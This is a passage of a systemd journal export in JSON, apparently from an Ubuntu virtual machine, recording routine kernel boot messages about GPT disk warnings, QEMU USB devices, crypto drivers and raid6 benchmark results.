} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a6;b=e2b08827b5804427b422c10c84f1567e;m=5736b0;t=5bd16dd1ab618;x=4cac53a8770fc56d", "__REALTIME_TIMESTAMP" : "1615280779998744", "__MONOTONIC_TIMESTAMP" : "5715632", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "1436976", "MESSAGE" : "GPT:4612095 != 41943039" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a7;b=e2b08827b5804427b422c10c84f1567e;m=5736bc;t=5bd16dd1ab623;x=1f89e9c78d034e8f", "__REALTIME_TIMESTAMP" : "1615280779998755", "__MONOTONIC_TIMESTAMP" : "5715644", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "1438992", "MESSAGE" : "GPT:Alternate GPT header not at the end of the disk." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a8;b=e2b08827b5804427b422c10c84f1567e;m=5736c7;t=5bd16dd1ab62e;x=f98f5d259b2bc42", "__REALTIME_TIMESTAMP" : "1615280779998766", "__MONOTONIC_TIMESTAMP" : "5715655", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "MESSAGE" : "GPT:4612095 != 41943039", "_SOURCE_MONOTONIC_TIMESTAMP" : "1442022" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a9;b=e2b08827b5804427b422c10c84f1567e;m=5736d2;t=5bd16dd1ab63a;x=eec1178dae8a019d", "__REALTIME_TIMESTAMP" : "1615280779998778", "__MONOTONIC_TIMESTAMP" : "5715666", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "1443904", "MESSAGE" : "GPT: Use GNU Parted to correct GPT errors." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1aa;b=e2b08827b5804427b422c10c84f1567e;m=5736dd;t=5bd16dd1ab645;x=103e0e1edea30124", "__REALTIME_TIMESTAMP" : "1615280779998789", "__MONOTONIC_TIMESTAMP" : "5715677", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1446596", "MESSAGE" : " vda: vda1 vda14 vda15" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ab;b=e2b08827b5804427b422c10c84f1567e;m=5737aa;t=5bd16dd1ab712;x=5c729b3bea69173c", "__REALTIME_TIMESTAMP" : "1615280779998994", "__MONOTONIC_TIMESTAMP" : "5715882", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "+usb:1-1", "_UDEV_DEVNODE" : "/dev/bus/usb/001/002", "_UDEV_SYSNAME" : "1-1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1448430", "MESSAGE" : "usb 1-1: new full-speed USB device number 2 using uhci_hcd" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ac;b=e2b08827b5804427b422c10c84f1567e;m=5737bc;t=5bd16dd1ab723;x=3f7f6606021883a3", "__REALTIME_TIMESTAMP" : "1615280779999011", "__MONOTONIC_TIMESTAMP" : "5715900", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1454205", "MESSAGE" : "input: VirtualPS/2 VMware VMMouse as /devices/platform/i8042/serio1/input/input4" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ad;b=e2b08827b5804427b422c10c84f1567e;m=5737c7;t=5bd16dd1ab72e;x=82b9b7cf8de193ea", "__REALTIME_TIMESTAMP" : "1615280779999022", 
"__MONOTONIC_TIMESTAMP" : "5715911", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1464412", "MESSAGE" : "input: VirtualPS/2 VMware VMMouse as /devices/platform/i8042/serio1/input/input3" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ae;b=e2b08827b5804427b422c10c84f1567e;m=5737d5;t=5bd16dd1ab73d;x=5c0c31abe2badf4e", "__REALTIME_TIMESTAMP" : "1615280779999037", "__MONOTONIC_TIMESTAMP" : "5715925", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1492169", "MESSAGE" : "AVX2 version of gcm_enc/dec engaged." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1af;b=e2b08827b5804427b422c10c84f1567e;m=5737e0;t=5bd16dd1ab748;x=940d0df36e6f4f07", "__REALTIME_TIMESTAMP" : "1615280779999048", "__MONOTONIC_TIMESTAMP" : "5715936", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1494593", "MESSAGE" : "AES CTR mode by8 optimization enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b0;b=e2b08827b5804427b422c10c84f1567e;m=573866;t=5bd16dd1ab7ce;x=49437386093b2439", "__REALTIME_TIMESTAMP" : "1615280779999182", "__MONOTONIC_TIMESTAMP" : "5716070", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "virtio", "_KERNEL_DEVICE" : "+virtio:virtio0", 
"_UDEV_SYSNAME" : "virtio0", "_SOURCE_MONOTONIC_TIMESTAMP" : "1518610", "MESSAGE" : "virtio_net virtio0 ens3: renamed from eth0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b1;b=e2b08827b5804427b422c10c84f1567e;m=576eb1;t=5bd16dd1aee19;x=f8ac91959c4aa0c7", "__REALTIME_TIMESTAMP" : "1615280780013081", "__MONOTONIC_TIMESTAMP" : "5729969", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_UDEV_DEVNODE" : "/dev/bus/usb/001/002", "_UDEV_SYSNAME" : "1-1", "_KERNEL_DEVICE" : "c189:1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1637764", "MESSAGE" : "usb 1-1: New USB device found, idVendor=0627, idProduct=0001" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b2;b=e2b08827b5804427b422c10c84f1567e;m=576f8a;t=5bd16dd1aeef1;x=3dee08a725e18662", "__REALTIME_TIMESTAMP" : "1615280780013297", "__MONOTONIC_TIMESTAMP" : "5730186", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_UDEV_DEVNODE" : "/dev/bus/usb/001/002", "_UDEV_SYSNAME" : "1-1", "_KERNEL_DEVICE" : "c189:1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1642734", "MESSAGE" : "usb 1-1: New USB device strings: Mfr=1, Product=3, SerialNumber=5" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b3;b=e2b08827b5804427b422c10c84f1567e;m=577050;t=5bd16dd1aefb7;x=f535519e98e61b88", "__REALTIME_TIMESTAMP" : "1615280780013495", "__MONOTONIC_TIMESTAMP" : "5730384", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", 
"_UDEV_DEVNODE" : "/dev/bus/usb/001/002", "_UDEV_SYSNAME" : "1-1", "_KERNEL_DEVICE" : "c189:1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1647407", "MESSAGE" : "usb 1-1: Product: QEMU USB Tablet" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b4;b=e2b08827b5804427b422c10c84f1567e;m=57712b;t=5bd16dd1af092;x=f90ca1ec6fed0efe", "__REALTIME_TIMESTAMP" : "1615280780013714", "__MONOTONIC_TIMESTAMP" : "5730603", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_UDEV_DEVNODE" : "/dev/bus/usb/001/002", "_UDEV_SYSNAME" : "1-1", "_KERNEL_DEVICE" : "c189:1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1650426", "MESSAGE" : "usb 1-1: Manufacturer: QEMU" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b5;b=e2b08827b5804427b422c10c84f1567e;m=5771cf;t=5bd16dd1af137;x=6effa3dd88249486", "__REALTIME_TIMESTAMP" : "1615280780013879", "__MONOTONIC_TIMESTAMP" : "5730767", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_UDEV_DEVNODE" : "/dev/bus/usb/001/002", "_UDEV_SYSNAME" : "1-1", "_KERNEL_DEVICE" : "c189:1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1652712", "MESSAGE" : "usb 1-1: SerialNumber: 42" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b6;b=e2b08827b5804427b422c10c84f1567e;m=5771df;t=5bd16dd1af147;x=74843213c1fa40c2", "__REALTIME_TIMESTAMP" : "1615280780013895", "__MONOTONIC_TIMESTAMP" : "5730783", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1663951", "MESSAGE" 
: "hidraw: raw HID events driver (C) Jiri Kosina" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b7;b=e2b08827b5804427b422c10c84f1567e;m=5771eb;t=5bd16dd1af152;x=3fa757cf0911c4bc", "__REALTIME_TIMESTAMP" : "1615280780013906", "__MONOTONIC_TIMESTAMP" : "5730795", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1672727", "MESSAGE" : "usbcore: registered new interface driver usbhid" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b8;b=e2b08827b5804427b422c10c84f1567e;m=5771f6;t=5bd16dd1af15d;x=d7ad4f6be75220d5", "__REALTIME_TIMESTAMP" : "1615280780013917", "__MONOTONIC_TIMESTAMP" : "5730806", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1675949", "MESSAGE" : "usbhid: USB HID core driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b9;b=e2b08827b5804427b422c10c84f1567e;m=577201;t=5bd16dd1af168;x=bad386160cda6776", "__REALTIME_TIMESTAMP" : "1615280780013928", "__MONOTONIC_TIMESTAMP" : "5730817", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1680012", "MESSAGE" : "input: QEMU QEMU USB Tablet as /devices/pci0000:00/0000:00:01.2/usb1/1-1/1-1:1.0/0003:0627:0001.0001/input/input5" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ba;b=e2b08827b5804427b422c10c84f1567e;m=5772b8;t=5bd16dd1af21f;x=60b309e1216b01cf", "__REALTIME_TIMESTAMP" : "1615280780014111", "__MONOTONIC_TIMESTAMP" : "5731000", "_BOOT_ID" : 
"e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "hid", "_KERNEL_DEVICE" : "+hid:0003:0627:0001.0001", "_UDEV_SYSNAME" : "0003:0627:0001.0001", "_SOURCE_MONOTONIC_TIMESTAMP" : "1686104", "MESSAGE" : "hid-generic 0003:0627:0001.0001: input,hidraw0: USB HID v0.01 Mouse [QEMU QEMU USB Tablet] on usb-0000:00:01.2-1/input0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1bb;b=e2b08827b5804427b422c10c84f1567e;m=5772c9;t=5bd16dd1af230;x=d78d55fa5ce30379", "__REALTIME_TIMESTAMP" : "1615280780014128", "__MONOTONIC_TIMESTAMP" : "5731017", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3296328", "MESSAGE" : "raid6: sse2x1 gen() 7874 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1bc;b=e2b08827b5804427b422c10c84f1567e;m=5772d4;t=5bd16dd1af23b;x=ce4ea08b3ccb4878", "__REALTIME_TIMESTAMP" : "1615280780014139", "__MONOTONIC_TIMESTAMP" : "5731028", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3344238", "MESSAGE" : "raid6: sse2x1 xor() 5550 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1bd;b=e2b08827b5804427b422c10c84f1567e;m=5772e4;t=5bd16dd1af24b;x=7bc7e78bc9790bf6", "__REALTIME_TIMESTAMP" : "1615280780014155", "__MONOTONIC_TIMESTAMP" : "5731044", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : 
"ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3392314", "MESSAGE" : "raid6: sse2x2 gen() 9546 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1be;b=e2b08827b5804427b422c10c84f1567e;m=5772ef;t=5bd16dd1af256;x=3dbd33bf27e28938", "__REALTIME_TIMESTAMP" : "1615280780014166", "__MONOTONIC_TIMESTAMP" : "5731055", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3440394", "MESSAGE" : "raid6: sse2x2 xor() 5985 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1bf;b=e2b08827b5804427b422c10c84f1567e;m=5772fa;t=5bd16dd1af261;x=7565dec281561875", "__REALTIME_TIMESTAMP" : "1615280780014177", "__MONOTONIC_TIMESTAMP" : "5731066", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3488308", "MESSAGE" : "raid6: sse2x4 gen() 11387 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c0;b=e2b08827b5804427b422c10c84f1567e;m=577304;t=5bd16dd1af26c;x=ad30cde6b6b3611d", "__REALTIME_TIMESTAMP" : "1615280780014188", "__MONOTONIC_TIMESTAMP" : "5731076", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3536314", "MESSAGE" : "raid6: sse2x4 xor() 7165 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c1;b=e2b08827b5804427b422c10c84f1567e;m=57730f;t=5bd16dd1af276;x=298656716ca4c04c", "__REALTIME_TIMESTAMP" : "1615280780014198", "__MONOTONIC_TIMESTAMP" : "5731087", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", 
"_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3584342", "MESSAGE" : "raid6: avx2x1 gen() 15727 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c2;b=e2b08827b5804427b422c10c84f1567e;m=57731a;t=5bd16dd1af281;x=b8ab218585856e3", "__REALTIME_TIMESTAMP" : "1615280780014209", "__MONOTONIC_TIMESTAMP" : "5731098", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3632230", "MESSAGE" : "raid6: avx2x1 xor() 10348 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c3;b=e2b08827b5804427b422c10c84f1567e;m=577325;t=5bd16dd1af28c;x=c972aafa65f71950", "__REALTIME_TIMESTAMP" : "1615280780014220", "__MONOTONIC_TIMESTAMP" : "5731109", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3680173", "MESSAGE" : "raid6: avx2x2 gen() 18874 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c4;b=e2b08827b5804427b422c10c84f1567e;m=57732f;t=5bd16dd1af297;x=f9956d03be3640d1", "__REALTIME_TIMESTAMP" : "1615280780014231", "__MONOTONIC_TIMESTAMP" : "5731119", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3728145", "MESSAGE" : "raid6: avx2x2 xor() 11197 MB/s" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c5;b=e2b08827b5804427b422c10c84f1567e;m=57733a;t=5bd16dd1af2a2;x=e3598bac0d84f0c6", "__REALTIME_TIMESTAMP" : "1615280780014242", "__MONOTONIC_TIMESTAMP" : "5731130", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3776130", "MESSAGE" : "raid6: avx2x4 gen() 22113 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c6;b=e2b08827b5804427b422c10c84f1567e;m=577345;t=5bd16dd1af2ac;x=b7e90dc8886b1e0d", "__REALTIME_TIMESTAMP" : "1615280780014252", "__MONOTONIC_TIMESTAMP" : "5731141", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3824241", "MESSAGE" : "raid6: avx2x4 xor() 13990 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c7;b=e2b08827b5804427b422c10c84f1567e;m=577352;t=5bd16dd1af2ba;x=5b95a6e5199c574c", "__REALTIME_TIMESTAMP" : "1615280780014266", "__MONOTONIC_TIMESTAMP" : "5731154", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3826541", "MESSAGE" : "raid6: using algorithm avx2x4 gen() 22113 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c8;b=e2b08827b5804427b422c10c84f1567e;m=57735d;t=5bd16dd1af2c5;x=8d5b31e4c883c5fd", "__REALTIME_TIMESTAMP" : "1615280780014277", "__MONOTONIC_TIMESTAMP" : "5731165", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3829277", "MESSAGE" : "raid6: .... xor() 13990 MB/s, rmw enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c9;b=e2b08827b5804427b422c10c84f1567e;m=577368;t=5bd16dd1af2cf;x=6bc886e2a58855e5", "__REALTIME_TIMESTAMP" : "1615280780014287", "__MONOTONIC_TIMESTAMP" : "5731176", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3831902", "MESSAGE" : "raid6: using avx2x2 recovery algorithm" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ca;b=e2b08827b5804427b422c10c84f1567e;m=577394;t=5bd16dd1af2fb;x=5df3582cd4095529", "__REALTIME_TIMESTAMP" : "1615280780014331", "__MONOTONIC_TIMESTAMP" : "5731220", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3836699", "MESSAGE" : "xor: automatically using best checksumming function avx " } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1cb;b=e2b08827b5804427b422c10c84f1567e;m=5773a0;t=5bd16dd1af308;x=cc096be16c5b0a3a", "__REALTIME_TIMESTAMP" : "1615280780014344", "__MONOTONIC_TIMESTAMP" : "5731232", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3842043", "MESSAGE" : "async_tx: api initialized (async)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1cc;b=e2b08827b5804427b422c10c84f1567e;m=5773af;t=5bd16dd1af316;x=6d453969632a59c1", "__REALTIME_TIMESTAMP" : 
